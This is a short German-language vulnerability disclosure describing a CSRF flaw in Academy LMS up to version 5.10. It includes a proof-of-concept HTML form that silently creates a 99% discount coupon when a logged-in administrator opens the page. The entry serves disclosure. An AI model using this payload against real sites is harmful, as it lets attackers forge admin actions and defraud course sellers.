
Academy LMS <= 5.10 CSRF
Academy LMS <= 5.10 CSRF
Academy LMS ist eine Anwendung, mit der Nutzer Kurse erstellen und bewerben können. Die Funktion zum Hinzufügen eines Gutscheins ist anfällig für CSRF, da kein Token vorhanden ist, der diesen Angriff verhindern würde.
Der erste Schritt zu unserem Proof of Concept besteht darin, sich mit einem administrativen Benutzer auf der Plattform zu authentifizieren.
Danach rufen Sie einfach die Seite auf, die den Code zur Ausnutzung der Schwachstelle enthält; Sie werden sehen, dass automatisch ein neuer Gutschein erstellt wurde.
Verwendeter Code im Exploit:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/admin/coupons/add" method="POST">
<input type="hidden" name="code" value="vinix" />
<input type="hidden" name="discount_percentage" value="99" />
<input type="hidden" name="expiry_date" value="12/11/2022" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>